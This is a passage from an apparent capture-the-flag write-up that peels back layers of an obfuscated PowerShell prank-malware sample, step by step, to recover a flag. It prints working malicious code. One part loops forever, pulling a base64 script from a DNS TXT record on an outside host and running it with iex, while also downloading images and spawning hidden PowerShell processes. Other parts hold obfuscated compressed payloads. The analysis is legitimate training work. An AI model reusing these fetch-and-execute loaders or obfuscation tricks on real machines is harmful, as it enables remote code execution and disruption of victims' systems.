([STRing]$verBOsEPREference)[1,3]+'X'-jOIn'')

The following is the result of evaluating the initial part of the previous script. This script base64 decodes the DNS TXT record for VFdWbllVSnZibXM9.biglizardlover.com, which is passed as an argument to iex. This script also contains the objectTest variable, another double base64 encoded piece of the flag.

while ($true) {
    $glideelbow = iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Resolve-DnsName VFdWbllVSnZibXM9.biglizardlover.com -Type txt | Select-Object -ExpandProperty Strings))))
    $twilightdepend = Join-Path $env:TEMP "lizard.jpg"
    $biscuitrecognize = Get-Random -Minimum 1 -Maximum 25
    $galaxyfeastparty = "https://biglizardlover.com/img/lizard$biscuitrecognize.jpg"
    Invoke-WebRequest $galaxyfeastparty -OutFile $twilightdepend -ErrorAction SilentlyContinue | Out-Null
    Add-Type -TypeDefinition "using System; using System.Runtime.InteropServices; public class W { [DllImport(`"user32.dll`")] public static extern bool SystemParametersInfo(int uAction,int uParam,string lpvParam,int fuWinIni); }"; [W]::SystemParametersInfo(20,0,$twilightdepend,1+2) | Out-Null
    Start-Process powershell -ArgumentList '-Command', $glideelbow -WindowStyle Hidden
}
$objectTest = "Wm14aFozczNOak0wTWpZNVlXVmhPRGs9"

The DNS TXT record for VFdWbllVSnZibXM9.biglizardlover.com contains the following script. Like one of the earlier scripts, this script base64 decodes, then uncompresses another script that is passed to iex.

& ( $VerbosepreFerenCe.tOsTrinG()[1,3]+'X'-jOIn'') (neW-objECt io.StREAmrEaDer((neW-objECt SysteM.IO.cOMPReSSiOn.deflaTestReam( [SystEm.iO.mEmorYStrEaM] [COnVERT]::FRoMBase64sTriNG('jVJdc6pIEP0rU7dSt6FGCaARcWsfUCcqIBpm/IgUD4hEiSIGvMaP8r9vtZva532Zmume7j59znmKh/a1p/5NfsmyWQuLaNMJKnVd+7k1fkKvVRnkO1DQgcJtftdvNKxpQTd1d2zDMaFigoaPmJts+P0RIEBBIr/JXbvJUncPFBKgkItulPiKLKeDThm1WuF6P+iOgEK8x7QigMKcAQWhAIUsERwovJcBdqvIcskx54+zvMO6rVbIVjlQGHp5ykugwPwxPkcdbLXP07JMigNGgMIoVkYDoBBUZHLXb1a9dgUKTaen+ab6aTSAwqz48hP1GjmF5uJ0w3X8l7mGnaM0z9tAodvHw6C2mr4cbcNwcX7D8vylS0ezDQIfU/yT1uqvOHldBworZGmCHKy8azqfG02s+sBlu/h3Xmzq9SlQMDHxvNSfO2dspWHS22wz7LhiC9XFHqNYjxESUMB1NWd4cM6Npm8Prf4EKNSt1+/vKRKVZpyzxoa/mEDhEP8g2Yka44Lt9Kh/WuBU1Y4O46P/feFnj78BhUXMkMIIJbFMI0aQ5sRBKYDCYO1h0sVtl9vE6GVfgwGicRyB22rT2DOuzSNSOPROaJ0YuZi6szR65s/atr2we8b57dhwsOfLv8pNzNm28N7aLDeavXzxdqULJCirISXG1focqv1G+8vRTYoQbW+qm+pW85YL8QeJSt4XDmbmAidPJs4ysoHCejbGt7pF+b6jTm97AQr0NEdTMMtuRmPz/eOu3yT8vE/RX6LEPRqM41btLPdfW61QFMnJG3UCEg6thwsFv/gox5BlyihVhsiWQLNc8AiIlFnMP6KBE2HtPlgXLY3UoTEZlh4QQx4r+UB5oBHlpSQiZp9LtFV1hqWoOJEkH7uvLOZnFt58wR8z2bF850SgtP9VJXsiEZAkIhEZYJ/mdhXmQMNaRQtkFu+TIvlIikPCR20/mT6Fay8tjmUgEUkhv8hf5DeRyFO5SXa7wSrQQvrEH/duoNVCCmeQpYCLIvXWYav1mQ88CYBUiERIjx2rJ8tPo7bLCJGgkwGFTxRrrYIsK6fInbCAVImmKKQq/d8KxU32vWNfDoksk38A'),[SYSTEm.IO.cOmpREsSIon.CoMpReSSionmoDE]::dEComPreSS)) , [tExT.encOding]::ascIi) ).rEADToeND( )

The following is the decoded and uncompressed script. This script reverses the string assigned to the cMJzG0 variable and passes it to iex.

$cMJzG0= "))93]rahC[,421]rahC[,63]rahC[F-)')}'+'2'+'{X}2{+]31[DiLlEhS}'+'0'+'{+]1[DiLLehS}0'+'{ '+'( & }1{)(Dn'+'e'+'oTDaeR.))iICsa::]gnIDO'+'cne'+'.T'+'XE'+'T.'+'meTS'+'Ys[ '+',))sSE'+'RPmoCED::]Edo'+'MNoiSs'+'ERP'+'MOC'+'.noisserp'+'M'+'Oc.OI'+'[,) }2{A43z'+'8KG1R90j76'+'WrqRe0zaKr1L'+'m7LKR5X1s'+'aiooB'+'DH'+'D7+J0i5tJ77Lo'+'6ANRbL+OWh'+'TP+H'+'i34F'+'Mg4'+'d'+'0Un'+'dNziXX78'+'6fT'+'D'+'iXrh44V'+'98'+'/b2/Cx'+'T1'+'iNhkmH'+'dEZ0Ln'+'Oc2c'+'a'+'P'+'1KMpKx68RJMAHU'+'4AFwwVE'+'imSSE6hS59'+'pc'+'d'+'lT3ESTEl2aHvZV'+'0JapPtRwySxNSQ'+'ZcEC'+'ae'+'A97cD'+'9UK'+'Y'+'IgN'+'aLh'+'bke7GmqIIa'+'KKT4'+'1VcN7z8t'+'mMNv'+'2cF'+'VLWia/S/1kBZJG7xQt6KK'+'5'+'ERPU9WkrNQBEo78GoZQz+ZT'+'m3'+'/7zAjM0H6BqK29+'+'ZJNV290k1NbZTu1'+'eYZK+'+'XTt'+'UUKbaJ'+'gWPt'+'0kB'+'waCGky'+'+vXM'+'EAJ8aP9Yf}2{('+'gni'+'RTs4'+'6ESa'+'BmoRF::]TrevNOC[ ]MAE'+'RTSyR'+'OMEm.Oi.Me'+'Ts'+'ys'+'[ (mAERtS'+'eTAlfED.'+'N'+'oissER'+'pM'+'oc.oI.M'+'ETsys TcEjbo'+'-W'+'en'+' ((Re'+'dAERmAe'+'RTS.Oi.MEtsYS Tc'+'Ejbo'+'-Wen ( '(( ( )''nioJ-'X'+]3,1[)EcnereferpeSOBReV$]gNirts[( (. " ; & ( $shellId[1]+$ShellID[13]+'x')([STriNg]::joIN('' , (  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE[ - 1.. -((  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE.LenGtH)] ))

Reversing the string yields the following script. The first part of this script evaluates to iex. The second part of the script uses a format string to build the complete script which is passed to iex.

.( ([striNg]$VeRBOSepreferencE)[1,3]+'X'-Join'') ( ((' ( neW-'+'objE'+'cT SYstEM.iO.STR'+'eAmREAd'+'eR(( '+'ne'+'W-'+'objEcT sysTE'+'M.Io.co'+'Mp'+'REssio'+'N'+'.DEflATe'+'StREAm( ['+'sy'+'sT'+'eM.iO.mEMO'+'RySTR'+'EAM] [CONverT]::FRomB'+'aSE6'+'4sTR'+'ing'+'({2}fY9Pa8JAE'+'MXv+'+'ykGCaw'+'Bk0'+'tPWg'+'JabKUU'+'tTX'+'+KZYe'+'1uTZbN1k092VNJZ'+'+92KqB6H0MjAz7/'+'3m'+'TZ+zQZoG87oEBQNrkW9UPRE'+'5'+'KK6tQx7GJZBk1/S/aiWLV'+'Fc2'+'vNMm'+'t8z7NcV1'+'4TKK'+'aIIqmG7ekb'+'hLa'+'NgI'+'Y'+'KU9'+'Dc79A'+'ea'+'CEcZ'+'QSNxSywRtPpaJ0'+'VZvHa2lETSE3Tl'+'d'+'cp'+'95Sh6ESSmi'+'EVwwFA4'+'UHAMJR86xKpMK1'+'P'+'a'+'c2cO'+'nL0ZEd'+'HmkhNi'+'1T'+'xC/2b/'+'89'+'V44hrXi'+'D'+'Tf6'+'87XXizNd'+'nU0'+'d'+'4gM'+'F43i'+'H+PT'+'hWO+LbRNA6'+'oL77Jt5i0J+7D'+'HD'+'Booia'+'s1X5RKL7m'+'L1rKaz0eRqrW'+'67j09R1GK8'+'z34A{2} ),['+'IO.cO'+'M'+'pression.'+'COM'+'PRE'+'sSioNM'+'odE]::DEComPR'+'ESs)),'+' [sY'+'STem'+'.T'+'EX'+'T.'+'enc'+'ODIng]::asCIi)).ReaDTo'+'e'+'nD(){1} & ('+' {'+'0}SheLLiD[1]+{'+'0'+'}ShElLiD[13]+{2}X{'+'2'+'})')-F[Char]36,[Char]124,[Char]39))

The following is the complete, formatted script. This script base64 decodes, then uncompresses another script which is piped to iex.

( neW-objEcT SYstEM.iO.STReAmREAdeR(( neW-objEcT sysTEM.Io.coMpREssioN.DEflATeStREAm( [sysTeM.iO.mEMORySTREAM] [CONverT]::FRomBaSE64sTRing('fY9Pa8JAEMXv+ykGCawBk0tPWgJabKUUtTX+KZYe1uTZbN1k092VNJZ+92KqB6H0MjAz7/3mTZ+zQZoG87oEBQNrkW9UPRE5KK6tQx7GJZBk1/S/aiWLVFc2vNMmt8z7NcV14TKKaIIqmG7ekbhLaNgIYKU9Dc79AeaCEcZQSNxSywRtPpaJ0VZvHa2lETSE3Tldcp95Sh6ESSmiEVwwFA4UHAMJR86xKpMK1Pac2cOnL0ZEdHmkhNi1TxC/2b/89V44hrXiDTf687XXizNdnU0d4gMF43iH+PThWO+LbRNA6oL77Jt5i0J+7DHDBooias1X5RKL7mL1rKaz0eRqrW67j09R1GK8z34A' ),[IO.cOMpression.COMPREsSioNModE]::DEComPRESs)), [sYSTem.TEXT.encODIng]::asCIi)).ReaDToenD()| & ( $SheLLiD[1]+$ShElLiD[13]+'X')

The following is the decoded and uncompressed script, which contains last piece of the flag, UniqueRebel.

@'
Add-Type -AssemblyName System.Speech; Add-Type -AssemblyName System.Windows.Forms
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice('Microsoft Zira Desktop')
$lizard = Get-Date -Format tt
while ($true) {
    $SpeechSynth.Speak($lizard)
    [System.Windows.Forms.MessageBox]::Show($lizard, 'Alert', 'OK', 'Information')
}
$UniqueRebel = "TWpVeU9UWXlORGN3ZlE9PQ=="
'@

Double base64 decoding all three pieces of the flag and assembling them reveals the complete flag.

flagvalue = objecttest + consumerfashion + uniquerebel
flagvalue = flag{7634269aea89 + c0434d59028 + 252962470}

flag{7634269aea89c0434d59028252962470}